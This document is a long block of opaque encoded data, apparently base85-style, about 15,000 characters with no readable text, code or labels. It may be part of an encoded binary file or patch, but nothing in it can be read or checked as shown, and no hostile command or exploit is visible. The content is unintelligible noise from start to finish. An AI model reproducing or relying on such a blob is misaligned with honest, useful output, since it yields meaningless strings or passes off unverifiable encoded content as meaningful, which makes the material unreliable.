zzrlSaoYs0_!Z9X`4&)(IPiM^B3^LyLzyPqyC``$NN&|i#>p)5lzGDHof`RhiQQk*{ zhgFumGnGdxumtIUCj;JUgnUm|OB#5qz0HWv3pN>3rBV0s-YU883j9uJIoJ?x|HBR) zB__-9BXJG8g!DJg&GcwbsRs3qvAJV_ZkT!?0GBaD0_ZJQM0)|_FQaLkO)~N=hIv? zP{U)@Tp2Y=bHk!2R9pRG{Ju?rcA>fq!gS!l@bPOs(Dj?8usWMm`RK5?Unai(`IPEF z*r0>hTi&Vv@4e-Z>Z3qh!_GrIwvD~8$YqKlWDM3A%|#!}z&OA0UuRguA{J0varMd1 z^Cn%rQ9nGAVyEv+ILmAyfmofp0O`kY-W=14^UA_yK_;}Ip&56pJDH2ir}!v1IMHd5 z^-1BP%P*$39{swct2ygqEzNNWJOln*2Kd~={+X2!qsJ3O+_*qx0Kyw#>LZ?ktP4g4 zeksf7?%d6w<<=09{vU(k4oPN-n5v(wP;{YsZqxBVj1(hy zH<8biMUG(Ck-phdLrxXf#urc_piZ%EM~T8(Y})Ru5l-XQER@Bw{dO^t0Hm9(f}}5$ z@AzUOgQXp3<`ATx(d?cW(-Z1muUf1~Ljx6%TtzNGts(Xx%B~*Kyc^x|*@@Jr?Bi#1bAu7Q+(5GK=@%wd@5U2NY%Kpo~ABD4)PCEYV z;?9}K+`WU6+NDq?0O3>=k%Qa2$o2s=02{uwW$+z1>`?Gi+RYh;BMSB~n)T3Xe z>EG#O*C=jmkJ~Hc;WVf*6~aVgSy*cn+q~5baDBD%coliH;nfj)90rjPjUp~$`QI~p zzO76es2_Z6b?Y?xz1NF=dc=PI2HJp$XNf**hWsH?wlXXi;rKdjz^&-G4{?e#5ekVr z-1P;@)h!j5yR$Yk=Vi;knF0e8b~ED~A)_Mv23>#Mr}<>dGN(SYlE;(*NrClq48`hS zaK9`5Rwb1=yWuDuH#Z!%w~@8$WW|(j1$CAa*5YECV#;66b5itzcv*UtHYLQGVUKVMpzeoJGpLAg9~+ z*h`XVwo7pA=OcgFyOTXB_md`xAN{cH#S6TdD%oLj)D(|(iUV!i92w|?W6a#IH_Ub_MU(pgg0HdIWvOq=R3t_nqDta?)?d%@T*aV5E8*^t83PPeZNm581AlDH4Hp4rtv&XHa?q{BRy|F4;9)_~wEQIw zHA1raQeWn}q>E`N>$tHb(lOH6fJ{i;5K})=cs(xO-bEh05J2`4l?A}&+F22Anc~n} zDNt`8d)j31bd`n1=I2Q-)tIRLdUW~f z@kMYnZ9f^wirDKRg6NRfUZb(`SEtr8){-#vWXT^Il>CX}9_foT%Qd9H_xB}OM{frY znX4Zqf>w~wzkWXJ9o`~;9_|~7hjadim!tV#yxePojWjAQJJpO|Ca?i{0JG+xVcz_Yy*q_Zh&!`5i+IwvdO>vO2^5L1swWta1Sq^rDvUb(g@tzE z87W99p4?G1xq)fPW;i%4>k{^6$=|q7OzOv{GsL%-&F40)W#sX|Mz_Fw znLl^r^{6}5mbJ};hb}a#Whai_u92xO{;E_yQ1+m5axv9MDB1`c{*PVxWkiU4DI8ykZDXIeK4){<0gB})#Dbele{WveJKQ*O zpMiYQ2()Afb}R6B#TTUa{X<6aM#moSDJwr5wExrV8pdb>U*e&c$Etw|=8^c&_g7Q0 zIplel@cGw177u}ra!d)49tPr#F~c7CC_Sd#`lSJ1%Y1`1`~;QDeAoCm_l2J85$e~)D+R}H;;GU#hkUh_I#)b#c5LKZBfWUAYA2TxG2VJcS=vyUX zpDTV1p3;xMh3<}U;B#T0j>*K(hJBn#u$qa%E2*Uyn~!0B(?}5_m(atk z@FF^4FPpZ3r8yV=hePLNiZ_<2#+xd+h>Zz5MBvp#E?v-3`yM@Z^`Ss6kGGLBw*9f$ zf25gVvOiyJO#`rMKMzg}#p3f3JWzH}W?P80kNny`(H-8B@y@XZt(so7v`z>kO0o|2 zbA)lwqN9fDRpnrzU=!Pe3uVFP_29=mB;!Bpzlk;9&DF(rVbiJ^b;oDTq-KCgubPwX znO0K+v~d`HFJfcZiLj+m?KUNleb z*oGiFH5n`S5E=#Zf6_hE=g>1hfKeeKUiu-Gd8(%f1%zf5$44~p_OpI>S+9buPMYGVkF(b&EO=Tb?U8n>>2AyEJ)sdYsj@9!mz&<2{ zyMysR)X2BZC#^?LSL&M8r>^`<59^NS+YtinZHYP=sS*6DbYdped`*y*Z z!4t2`-16EObWWR??6?pauOPv-v^Kw#dN8{<>hHy~7|GK>3Y%Yp+1R*PNF<9v08s#! zZ$Mm@wtcQ2iWJ~I_M8S=rE#>3_a(cPj`Z40Uz3QALzhS=vgtY$x|IlBqD`#)gb@c_ zZIlDk&+u_`*n57M(bx|=I2hM0AUWzRxZpn2=J#W%HJukZZ@P@J`7euN5lZ8o4HJ{E z!Q4e3o~~O=_Plux_iO~YF5_`|&&y95r%JZulfCVmun@uy4vEp}S^zG}h^eA$mTPSa zD{f1)d+>MAV*fW%o>3MX?Jav<0P{H@be>`XscWt{ls(4flkT_z7xv$IxIE}T z1{fDjWBX+3awK{-Frz;^U=!z+Y%-SJBug>Amr49VGsGP(Rff;1;5PoW$(5ZBJRrm?oqR$-D%DA~w2 zX+yN+vQ|om=;cqG3eSUIKTzQeT&v$nf&rqqV%yj@!8Q*C`8kNK*)rcN_lB@`e>sM_k)fRVc} z*JD;58B$mJ%`=WJ2Kbw&4gwExYo%#*b?F~vN6_dQ_1fQY8M6906Jnh2fe5bFz z@+h7z#H`*oE%S?Nhdl_)AcE|55Na=AHPG=xD6c_IBWs}Ny$1B18jqo;0knval}vHeWVxBa89ZnGozZ>`K@pHnkYO{L0XW0#7wD@8E%K%fkxnDPq+EY9d)8<^&LM&CQ1k8t*Y83Y16noP?+6?H>t0=09kzD zG$K6%EMzdc{rh-m#AVv4tB{a?3>J@^z2oKaqbx*N0d#@xCS&bmpi4LU;UmsKW9|Dx zG67Vzdb^@^9US)Zs&koCYV)f+&vsfRq3X&a-G!1zg>BZW>vWmbx3A^TNOQAKy1DssD4J#A5xMRO_ts2%$N-zzO6;)XnP`XsNNv9}`9Qec%$u0g00(+VOFQ>0A&hh9*jYqGLXUp`6^HP?GUEc_I1BeMcr7Z8~ zo!jb6T1)wSb-73k!n|(pD$NGAm(FyXTu@^0)c3*SVXQF44|RtY(H9Y6(F{JkN@*W| z<1CtC^)-|wzuvIxqLrBaisCScNV@9T-ROzCxV^spxoIGoYY*;ZhZysfD%-f7JIcah z0Fxr5Ny@VLXtY&L;dOvgMV)$hoIO{ns{itiQ1h&^ksfJBqMKwSFyY}EXDb`GwX)+T z>5<8WH;0I_Rq3w z>Z16Sg3Gf+omzXujRqLx%<(}n-;^{p{PCeCf1H{{%4u+kRxDZfOS-tlZ!XJ?$=_p} z#4X$}!awX|=cZRP#b)i|^9i}i?LIqf_x?bMY3qnLH+cr619XQA3L97b$L?k_E;ymE z9p^M2kDB@wC5rTR2%RyKji!v!i3Onmc^|RKBHv6TjHfh9e7XFqwX|VLj<|`VJW2M1 z>^qjm#zxcbw;voHBHC-m(2j@*0Y%NHN1&D0oo_%3c+FoPf}kQkqw@^7BWoQ0o#jLm zO*ybL=TWFE$OLv|7$?Ge%B|$9xJ*|Wc2g>f30nM;YT0zMGRcDXl9?S%m7hBa3Ys2` zzU~@};Cm6O%zm<|=K;yK#+jsa*RCfZ*>#}elk|uxxjWNjG-8)Owwdj0xy9ZnEVOsf zPMl^99ra*_W78s(*2J!+LY?~9_2EZcVEbD(&C>_weQRa}52;^Ak zIA*?^KIhgF-}B{$lG!@qy0PwKo(0A!RM%F(9Xgb&=R(U=FjJivGlB@kJLDXTz`X5W z6WrzxdX>VytR&uLwJc)pc>bG6LwnG2ZEVo+e;B*c2l!MoS`*6!wrBMNz<;DGFQCzNjoT5Ta=a5i@X3Tny5sfedS9Ox{; z3|#J2$(_87NSm`JA*iM5kmnFy>|*($kpWwhNiEz+@9U%nb&Wlpug3>asE49Vh+{i< zOAdV;_Da-5${3DBfAc)Wh^(c6(MVlEpydoQ#nQpYiHguS4(R4862m zep9bL&d&Zb8v}$hE|3tHF9%K?-R+t{U?c?kXnC#x-+0=N*EE5CzED&oj@xxB>~%Fr<{t$2 zmVxCFUYH*vq=&26anRL+qbgqQ>i4I8Hy=PpBBB`J)}VP8vd9L?BVYPTnWQy@K}OyC z)t992v&wn=N96b~#^Hm{VTtRMG4HS=W~GPx)4Y~}6MPTHLb}&FwlQp8r}?pLd#lBZ zpBpq<8y5_0tM~?v^J8nTwJV$E)m<^+Pep2nJ*r0-VSD}Wn-}EWNU3D)ZjhGUVptz5 z)W|BTK2$_JCr%)f;ObuG1hd>CqKRU@`TyTC8Fevo06Eg1Z*$}O6pMcBq={_$d#$gX zzy;V#W=q8ZeWjEN;Mu`9cmrNpJq^}fcM7N=9JI|^vlkMsc}=Bc>h6%QRsK@#()Cj@ zuZo4klaFmWIM>N8_`WkMP%;p$VJ9T<47bpHd`esDE10*BaYSN)H8#DKF!8pefdO&E z)zkrMN85tx&X4f@l!Vk2Ra^?{g^bPPN7M)59U&m0MeR=0VT@;*9Wpr!()6hij%kk} znF|3AMu2@UEhpVsv2W(($~%?6av6&@o1|=87}~QFJI4USVSel#mJh z#dMe(Tg3 z`~Pf<*(?5f{~^V|fVGU@Rdykx8B}e)VcmQ`Rz+tlXF*Gs}UZ z=Uq9WcC-jTPvJg5-&8fDj;3m&vgtDT=ptRu<#PEq;dHzS|9)T@NV;N+E1IMlxQs5= z@J+*x+Ju-L^#@HB%-s(I>6DZh(pWQ|w0N=lD<-&FqnBTKVEipfMf_A9p%e|eOPhOd zh)Ui~syy1NrFdpZSyp9>%1iOy+WdG48JLEk@g@>IWnPs7A(1S#FRaeDN$cPma%eX) zR=dl8Sdn5bBWNp4NqV#<+#EdFq@#lssd$fd3M$B1@;Z%nH+j~FA>QYO-`geNG`cq} z!ckT~#HyOvzor zp=G*_9#3LkN8;infnI(0S~5U-Z@e{sbw2A>Ys{y2_0VTW$nmWm0uvZTCJm+M~D*;|G_eg`Gg9UqgpFb_%he7gZ(Xp=yWPm)6fvJIlu z`WZQMzRM@L0}DjQ2&@7Ybs95ynC;#Q#%=poGCBZj{jhs078dtKRWo0|#*#tdmh?H; z(Ejpr7tY%`AgjgIV7TL~pmuoz34tdm5hUlUwRL&+IsZxnf|$aO8yJRHu8_Aq zD4guwiCNiUXNRg>1L@T>P(D~GW@UFE9OPLuCU$$9(&fPpQGpCS$JTdecXh8ovi@VL zDK)eJqnyqaJz*vIb?{|{h8x#_>nj_FmGC?^V!QXD0^g!&K|n`mWD3)@8;@9s*)OT< zwGs;Jmeitw<@2U$0+F%chHP>Ox{U9qI3KqnogusMjqqDti4(CpW99wt(ffkfKL>vt zyU5^+UrXmUWUbX)B^`(`DNm)mi11IO;C$BMjNjAkxIV&k4|>#ZduuQ^c#I6-ely3* z;&jB1Cr)l`Z|f-=Zt27)QvBP%2OWB+11(5tsdxyYxDT~4v;F47V5UW33ramM{ekgr zX`u9ThT6+rUVZEzNjjzvjrOzVuW!ftSgH3db1J8yCDRTzS47W};{QmZm^X++)_;Y+ z2l?aU#LFYth=BiQ%#%vwoVoJ1U>2xj8VQzBi3NaN5Xp$v4jgQ@lvFL1X(~V|6o5ht zJcuTvkV-kf=x2NvWRmd2Ka<=enNg69(sY>fULeVM;I`(6(=%a@4tId;>)BGr&5i^z zcoYw!1p%z7^zgK!Qot&M{#Bp^GRJ!&eb+WXqo;dd?d~Owq7JYNa>PGZT8h{lX0HM( zZUom{GSv(8<0<~IyAVsvgD?IN>(iImHrx%trCP)v4c;Vd(-MA2uFld~ME7j)mXE@|-4V|E_UgP%d(20yHDrFp z19O1~eHA`Hj<0I%qS|(GF@C`9eP{dab!f>;8_}xTZXCKL;!g{q#Q@5nI{c{X&r3HQ{;kx}}WXS(jqyX|0jD(qgYLKF5hru+DLeSNZ*d`sK;=1~{r`NrUe7@;$43 z<1nckcrN;r^=QG?DHBgspsn?ZdKUI4(bmj%%h>gq-*2fCZn*v&<%|2dO7SA z;bMAduY;w@04h&z#w=#)gxCz~elUf&Kvq#+75iL8&L`TRXhe56CR{+H$ww8{nR;%N zKyprg%s|C7-+lv>cd*BWhdUS`wjiMk2j2twl667%W05H%4k|g6RiK&yb}=|`8V@-# z?v5T`P#F!E7t~0_Ued7US1itSY!y!I)~cMBK0&s?klb}O$_X9fUqPPD zox=_kX5de2ktorpxBe6{Uj*l-D;spQ+YZ?z+(lXG_Xr=zABa^#(9hX4QEci-gMv}4){dmpYYhRxT?ynh*$Pdq-5Jh&<2Q_xt_bIrrKmJ_n>woqT zoD{!kH%Lm@O@|ko2-Y2YKU*{3h!?)?h6vH-Ol9us11^Di6-*qU(CQ16JpgsIr?lf_~dheO|dYShIv}U%X!OJ{@=njakTZ)cwg+ zEXStYkgKUCjqvir@+Lfb65|3|O+wPZ@|Wu(ZB~)?yESkaxXnJU_sJ8&nxFnX>0f8o*n6WEW{H`=PnA(+A^^@+uD3 zqboLbDyEri&TiNE^UR2|4Z;0JR;B_cRZZs_zjJHnscw%3)We-#w5v+rMDFvG;|4Xp z6Hke}evpxtTv%v`Ows2_-p`108jQd=uC2wdu~`PR_SkiWSWs7ByOpar(m^%o$tPuB zHmQK(po!?DWveTCCq-Q04sr7*uc{E9dA<81pk+Z4)~to=Vbc6RWxOmJ3=x+J8hb{M*Hc% z9RRAVAR5U0J{U&sJ}&xVy%*4Dw- zoqYQK~4Vi);;vpowZvEUB_g#7so7=mm&cZJD-f9SOV;mVv>Vi}VKwt1W(Y zT4bf0QyX^Wq2`cR2;xi_)&|V^h*?*3fyz6M<#&7DCvAS&ySd9t^kl@!5)o-zo}sr* z#+=Rs{plo>7a$ZH(_qEBO5a+C;<>ECFcr8PhV3jNacO+M<U3fc6Qn$BC7WOjT?e)R^T5Nhgf3MrUEQb(}V1;kG} zYOwgE%{kM-2Q+ixU%U9GeYf3?ASJg3Pa3ODvGPwW+H`yq`4O_<7A`zc?C4f0+8)V_ zr~KimkvI8X4;-G=Afjyk_O98OA&cFE3WRl>37tmctM9H>pciu0{cN-7UDtb(E5PXKx#ZeLTXve znZ8E4fx>0NJtyR?G69~_S1jsM^oLQ8FIiFB@@IDf zI~8X@Yknh{1sRE@q%{`shp>sp8%>PsyRS^+JUkJW|Dz@~x3-qW&H%cAo%t;`x(H=3 zV;yu?YU(I`r}dik437|$9+~sW?Vvf1$Nem#D^ocK3%Ly}aDzDMxKqjSbym$9=&SIjh-(vOp8w(C@-}hsfGJIOl5 zHQjMBshX7mpwjkAW`J3fLsj$=p&VWVLB1yMO?wm5g-`AE!Waa|c2K#}IwQ9atgI$^ zXTsJO@AGPjILob`R zC(V-%WM3Yz{MLVBX7rLT>En1T@6EB(7!7})6w=IFZ0j5uU4Ml5pzu$iG!pP{tthj7 ziknFW5tHNt)mNGv)X_90K%JFONPCJK+Z#}m1OPG_Eu!NeGfJ2+J_D@pH1&?Urt>My zo`GNV;LgKv-gjX2TXDZ~7~bi>=#F!g0haOyfJUWh{l%`)z3%)wNU6YJnEGI&j$FxmD^K@05^~v=D%w zoWI{UXRo!aI#z?Ox2&NzQFb91xlC_9p2DwRqs!Pi#Wkbf7G1m9wU#L0b)G2Rbf$eP zb=~$P0Sx6*^K>JMH}l1VPwwr7=pLe1-Cm@W$LQ4IWr)RX7L|2hHQc{OJzxI(&CN|R zB>k`AV*vLrSnsdw>R1}4PM7&H!FS{Y>;ubmkM5uO*ck`#0{9p-g~nJ-Ti_dX%rfBAZ1sv;_8|7yGLjcSbW3o!Nl6LwTO{v_GiyNg2GC19y=pUYn z`Q_K`&m4qD@GWmV*PJvD{V_4@6Sbin3!M57nYzO)M6%#}v9O{7E*fkR;aVyGG8sax z(~sZXQzKwXWIBX7mPYi$);V&G%sq2s$G8{!<3DS_)wkn2Or?nlcteDmx-#V zWqL?O44Pj@`}KHr@IdEdtbR4=87i@bF6*YTI-bF?z-oop+RephX`%MI+(9+kL?LSQ zaOu)y9;>I^dUTGRIrKsP$lKS+HKw9Xy=}+QPFSeHg=YsZKC~PG=TO$%<)td8%B3W< zAd1h#cW(#os_l0$N#ka(wiZzL$f`Dn@jZUiOnv#M^{~Sw?hpp;oC-)+@Y?Gm4U~i&6(aPeE!5G#4>~Bqt%b`#fHLkc{ zTi823YltenMl5O^O|nopsNrh+9{brNbM)U{`WX06k0pK8`FzyL+<70a#8};SE+Kdq z=UrPBT|*ji@b*;PWTc!wPZJ`JHXCvsrG{PV<}mFQ8&qxwJOdE=7PmpVb%KrSR;IHDTlXz5IsE`|FBlxpnziJlB}33*m_!`Crx1l^{U>! zg&aqHiU-nOPr|7U_PPnWJKc52*+f#HBEuq+@gREStfdUB&u(>aqC5Gk($ci&FBH4)-+YWJTczsaC9!;xh-FP zr}^K=z1P2=Z#oTyFLN=fH8nNs;P#smMtysy z(9gqLlW*ec-JN;MuHas%No;ukLU=x|APQNAVk->6ln$CiF?RbiJWOhfBUvUY>eqF| z9EMFyi;FMGQ%}77Hc+#vZI<+KiV681#&-#{b#*iw{DofJ(1I?r@vnk(RqNr}zjnk$ zloOacWC#yOiYbG$Petk!iNf_yzM!!AInZ=srP!jRaM)^~BJIrsBHsE*Q}_=ckRng6~m@*C4K|)gpmHp7q7(y_}PMuh?VVVM_L~+OybK zU3IUmTw**<&j@98Urn(FH|J>cNVS)rHY`LnnRk{oYHp0Yw!QO+qiK(1U-Qm>Wl!?7 zx%Sf6bY4yPUwA$EjV-c2m+=HDZa|Hl&3k!hO+elCZz%YUj1X-C-E!+KY3Rqo-gDfP zU!c$5S%Q@L1(BtXkFyNx(@1_QkDuwCKNs}WzBUD(ir9&u$o_~e#X}w(R1^3l83&PH z#CGe0TfKz)j8o0WFR=Y%TCFEKnQu1l`u-SrO2b*65QMCi2Uh6ee5z`vJV@-O7me? z@$HVLTJ4n3HPX>%*eXV~RsZX{mBb6re5CNcPX|4sf~}Dh+FeVVWKH3dLsb=l5|Zpf zX@0MQOT!fid#_Mga!86_ULY9W>jeKjuVQAmo%deJ!u(H)^XT%9u=*oh+3p7ctU8}< z23X5&f0Pm}?b(+|&rk4c=Ddvp`+Mp0%CRhwP&Qt7!TM>y8dV2ueZty-W=;#5MD)fX zOegK;4q5N1021U=c8GI7y`o&ch83B+9;Fx&XhqTaAK=WVG!Tq|L$E5iL(-qiFJ>2@ z3Fgmri#og${KMP?t@E{96W1e-wpu8N&Nln`)m*}_h}$c((0ENU43Q(pZu$%qMB(3s zm(zX>-ge~P1Wi2ZY$6?~jTKG+RBKJCE+g-CT&NJ6%tfSh&N)L*8tIZ;m*(?qq)oeF zf#%5-+!arxyjl-7)DyMjMSa7uMoh!EW1zgMPs#BZx4x|F$ZDE04Y=sWSBC(uoAs2{ zU8(i^MvPP-{g)bBVCPFiw2v>O=G1&|YN&UXcN=scx6JmsE8Ms(rV!V~^#U7CWByPF zh&+4aeVI@8g!QA0Nanzh`MB}r|etL=6#*;VFxC}T0tYwG+t@k9?+}z7p=W>~Rxm)%#bHAl> z1r{+>1|u^#9E;QpfojDC5QzznBVRFWl%-z^&bRVdX(Sn^xzEKX3ww8-{@!PAN*~n} zUb8{6=0XH(ytSG63@N~{o5hgZ;4%wrB&jx4&MH7$=Bshnw+B2{6@P=i0uP1hztt1% zi~0SMsn9R@OLy8me-u-`OwyzbLr{f$WrqYGd%xrYe7w(ZsD(8Zj~=Ma$VAY zHuL;G%dLCq68j6(2Oay^i~RN9dn#zq=AnWMjQcq$BsBZO{N!M2`g7$ozU_?eP-sj! zqw}%V%<`;@xUu_uzU!Xt{VM;56$RJr)bV|+FL@0&j4>qIv$gQjhFS3wG6w2rCRTQU z*>>*<6}6T9n!cjP)C9luPNkT$lPsD#6Fh$R#N?0aPe|ER16v7pZRF-T8d(Lt5#Kn=t`E%VG=|4OMxgOx{eXc)C zks1M1qLfXzlZ_Nr;H{~GQTrAr#h8s&FzddG9v9s;1>X#_>KgqQ8I$ZrVV3MI|OO@7!*+)`4(ol)^W zCWhmNI%#?v0|~0zBkpHMND-HDaf}^Y2_sI(Egh=wyyiS3uYRUWIiFCOze(FJ>0EQ* z!9XDBLvK^w>fdD=_8O%1NK>za+p$Dm<{KW`}= zKK(7q3zc^|7OJnK>YJj(O2mnLiJIQ%@|5@s_y;r-{X6i#ugL5WbTAC&!6T4KBi6f@ z<(Y#@>HXBi=cf5d>|~^FiR>%fLR0hoIrHiVkR0TEa%|}KG3@fja)|ucuue-IF>iph zz(1))uu^J>4>=$BJ|Ts~=r^rPO+Q`l#rAl=$GkjD*PE#kZN1!D2L%+ zsn*p5Vdc*HQEFpx@l19U*0H6uXaxB&_t!W18s9>n$>apev`AL#HA&pf+R}MTat55u z#*%-!D$W#kuvw$pS0uPg$1G3yxE@kG>{GXg-#2RETUIV$-`8MAAyR!mW~e-^)0fU| z^636*!Pg*g8u7D8xQ5fB_cuT>qxOVnOUe$6y?~1&%j0peKOIjLa=f5cn2Aptl@c6s z$#T87c$K)&UrLA%KXx6j@-5{4s`!dDQBRnatFnzkdzD{H)VlK;rC#q`f95J3yX-(o zl~?V_W)5Xk}cr0`VGsX|2dbW+2(qxz?Umrlj^pbDw%ktHq6o6gPU z?`<31FbYl0iGN9YZEya~WsMQ$#R%7HUM-c+Dt^Y#FVW{dH*chla6wz8!hoIrIOIaz z85eXTs-Q|wFc|r9(@6W-ZT!pK49QgnQ{61KzcE6f!0Bo8*l|bH;ndU@kupNY0Y)iW z-SBG~y7|5BdeZTh$g!rJrug=A2P4+b@w*CtYX?F@801E7{iyQZTN%fVhb ze`n}0nN4_X&II%2l$c@R7%(mQ_L*SGN2SwdFu1M9H67$;vv8nEYpu8xTm;JoJsD=Q zlFGDFBc_H1EiTyk8+Y)Cc9S-&n7O3J>EM1J%{KNe?RnU8%E>0pe|CW%BmBu9L0$$m zHRF(My&kfyw|HROM^6MEhyF$Ci}LEYg!ur9S^2TS2qID{P8PJr32^XRylG{P z8cZC7&-e3t5&i~e8%q*S@0DTkM$$;#S}fFZOuv#&p$vnyt}MDiK!@wQTHi;1*6fe% z(dk(5&TpBNg;22psFyK&c)y3M8iykR)}fbJ^fVefGDW^Iw{*TqhibX|)_ z)BvkSm*Uf=O{9ES73GIQ zTk8JW&Nq6aKzS$dd*f@9wBa`uAJjW;4K|?IM}+U(C-qBUEmyVoPk+|7t!9OAZ9ldb zZy<%QMDQ}__!p7C{)Q0ElH1SHsWVcnP^I7G^ep;MZI9*kze!NHbT8X46>8=buT)Wt zB?@h8sMPI2lc`ko)idRJ$Id|?-i~n7wPzNm`n=tw6wdNmq5X(|;$;seDhrkRYV)P# zs)ttYEQcbf~R5_9~c~_`j0*w7KC-+G&0YM(Be09to4q zE7+2dTjgL&(pLi3l2zixpp=orzA?V`t&f`D5M-VX-f|QHHSNb5azC78P4Nk?4NYEc zgwTJ0|5v<^eE%2o_W>0*6`~VqYF}Y99R_}1Y(1unng7&vnp7d*9pwsIMW)|HCx~m` zSC3428IIC?cr`lvD_(8lo?y>p%T+2MtCprgwY%s&7wg3~GCPdXUFZ&@VKb=vv6&Js zADuZdD?Zz6u#VU_qWA}&z?c^7$Za%w@yf(I`G*&jm%?4nY)-phzrVwdO(OLek}$C- zl)+Oxlq=fhSlMWvlG}=HI46Ea!Z5M*UUDRN(Qs*(Ci5YH0NA3u4+hdFEjkm$ok=Bg zbP?jd&@OK|Y*sqMPj7xceyB9?T&|p}?f3fp48icI1YvD;oD!0j=y%peJHJ6yli!TL5#e1Lvolt9x&KUz~t&V`BEzk)}W`om+C}$tW_P7^`#H;96!K zg-kW;qkqavEb#yCqw9#Bite4WRaHGD%V~{sZa#)hEc>}d9OYg*l$z^OM_`y?n9KDWeAts6p6%5|OgbldV;eJ(5lrH9ER+oSM4M{Oq60H6_6P7hZ)XM9qHuXP z>z{6@=P7uT21|7DAvlX(CNZj!?MvvB9=O9SR`H3npcm=J_NqK zzW%Myu^{}L3IDMAga?H}c1jy)pa)C!XmxJmMSTcy!{8(;k+dxMu7+dIRo!jk9>bR0 z;OBssQS2;q0K?5kolAvL_hFApgx>*{6dBDp8@-S8wOd9i)B>7b*6)`7bs*QDH)0s# zjIpW=?dYTrX6mzX;Z=BrpJTw}AiEeHXE1zev}g=a@)Sywh*uEO8$4_l%$jb%?Dl8O zDRRgwYLC*)O3-t2rh>>kR5hJ3BwO3THgz8-<5!3_${BpDQLgb-+eB42az&f6f-RPa zDN_`X*M{QE*Yb2}C=M}-eQE|5dZrCJEelRXL0qH|r7SrQ6sjn(b{zDqNcGLt+#$Y^ zkha@1@&iLhzLVvfS77Kxg`dY4XA<);icoN72{ZoTe2t-BE`=8{c=+e-t7ji*C8OHk z^G@>q{|aWzY(dXDldA|O^|8+5rtL5<+7ax;=VQmk=<^e+VGfODi}<4C$Z8 z5P!NG7ZRJ(eQm4Ab)E9dG;!%_l9k0wb9tmG)_0A|01w=?Y7H_no-+OP+jo+?Y~BkO_qJpRW}xg;xH zgX;WMQXvp}rqW&nqJhAF>bZgu1Q+M$=@~#|9JO$aE0}lAVp(X(Mjs{zV#1b%DtZ0{SN9QB*cg_MSW-v{*4ex9bs;^SRaRYqX?L?b2N8o}EI-b3JQ|?|sW# z_5E7w%cH(eG&7kYwOokT94d$xlgLsELt+ayE0;9=hXeX~C}f6B*8=D4m%JgR){~~6 zj!ql~oaChf12k@E%Uw7oO#Gxrtgg-&ZB}+F_D(7%-7HOet*VI|s-za=p=67@#2bz4 z4Jt`K)N+p`jG;6Ka8ZGd!O)}cchXv+f2upSUgVSZ4ggTEFK9`A=ldX zM~If}zZ}wMt{d~8027`<-BOCn>Qd!uJKk-D>5YCZPL-UBDWdKWsjVukijF;gS&nFQ zWV!rpa*bx+_+XPSwU9j95rV)x+W4F!L!SXb_OD0`X|s@81yXA%CK4c?b#b0~!A)8J zO)Hhf+v{!}Q$puW88gnQw(;#to!ORj2+B=+?vp3b`F+)1<+cB%i>9I0vQcbYaTsWo zowlh`r>%?+yxMsY2{B3d5ch_sK=A+`vq!R9`P6lto)2 zJvo$+Z;WO|>1k*{{ZRVTFy-(zZM$x~gHb1UtbL`YRUQY#YJaeCDle&L)L-y59 zWH9_WP4^e?d8?1|Z<+D`5Ris*o}e{S$G9+e?T1R*4y&@^ktthXBwynx)#1|G;uJp> zYWhY4>0u(_2A_>WHgP;SpH7W>YLYa7iZvtJE<7Gkkk`0zB9uMFHnZFKvspZklzEGn z1b9+k&cAInt4XZ}UN2Iftu4ICqWwaGyzF2lF^GDf_36=-Ms;yCfTkCs`{BW3SKk_I zt}wur)Lr#WN9XAe3C>~FAla$~WLdojqqUX|H&iCU*V?dV1wGc55CbnP0bfEcDli;^ z0#kH;1nx{@@))o&L=oSgC2h(gD96BZ*X+Bi%Us|?fPoC~mUj#_pX%TgQZVcB zuO(zRt9-v#|gV)KZ?;NHMbd*cHtyGj$#%j@nV2vrgmf z++ioyi;n5f6-$R&LCqPkkITng*MBk`{~^#hT|L?$U=A*dkcumOR#6IIEMlqOY8!74 zZ9<>fr{5bfm7hlF9_Qk?+H%fH&Z+@U+RlEQAXZlJ(XqJa8yH$nEZ0z=oGuBAI@fPea zE6?Slx1U~5Xl2zd$~z0-Uf`NudN|1IGSEk?>N?@>EwA9B=mo1=$kfl{^Da^yu>rk# zs1*XLqBUmZID0CqEslIBmUWJ{>NFdKkDi=d1t+M=xH$}2T@n&P4_1xQQNFPR!%NTZ zhX%CWFlQC{rOUKizm}prrS^ORpnkCsff=A^QclC}F|4?=N_%D=Cg%;cBGC<^%9I$oN~K^6YXiiEslTba zyx+kT*RQD(dP4Tcby)E?U3&u`gq!$lFhj$$X|h_Sdfl~h4@tAPDpzA5hPm1Wx{7l* z>m84qUN2>XE6e`z#qC4>zFg1%+_W@2`j6Z#qJ_Dq!LN*@)k$t#?KR#o;lHgMuZ5Bk z8B>@nl0gR)FbYo}zw?G)t1H}W@$$swKjgY&{_vf)>*Fb04{QB(isg_GBDtDT+C$jZg|m4f5MtZ~TBK zZ$@GuvAvQna>ZP({9;bhJzLwl$ZSv-4wndi2bu|qA#LJPmT`#XjZGoPa?6zXAs zDUlvdY2zZCtaAM#hVH2sw=x&i4u{yEZ^oGuTbgl#fguCz~#jsCkEw z^4ZDjEzemn-;*@+>|kCkoY#Y2)Ea^@o3_7GMZ3*rxE1k7Q^QZE#*-93>qM*RqJE{uy*J z^I5X=i~#>m3*6mb5)SakYAp|2oOkc`?5^Yy(AYkj*ljwHM8BmBuDb1ofWVuSr9M*= zELBL6814?5o%nLP5|sTG&w~z!-T1UP6jJH!WeocC30Y~%Rx<=?IU$NI|C~(r?h^Ui zs-#G-95gBn2+FiybXrR01D?uls6I^Kglw@PKJls`(aSe@L@#PL5*^Hlzj4@wCqcrW zVObja(KF_T^zLM+miMD6SZmFKANCpxN9t!!QENgb;@rGDrvn=IK}-SHmrC>#3&>~w zXw!o;#-4BD?FBeUEpe-LAq$nOT-#zuIn23AjwTH;O!0}%A%ff_2eT#z)JZ+M(+=4d z42qWd6;F>TwgS4R9vf+!HoVZElOQ57s(l~f%w6qN-&kuLeR>AoyxjQ>=RV%K)(_~( z6IL4gAnDt$TP@r85*-FxlLEqiQtXHNZS!md*sY4lOJ|D?qz+Fx0+a4P2ySvlnLFPv zLIzromtJ|*2ighLHln0gBnc!o1`fadBknO5x>g086!%>3oM6oIK2;HmwJO}*-|ILy zI8@!?|2IY0-)UFZ^#GZlElVA2P?r$4NDHVBv>0&mi4%&ijQJ6^q69475YsqB4^IRk z;~`VaRG*hG@atQw@HEWD=n4xWu6DUmAyxr9y5?Gmw2?PenG% zudQ7(MDuL~;vdz3Pn($18dbrw%)##($zO#7n?V~DM-~K3@OYjHrch6{funpp 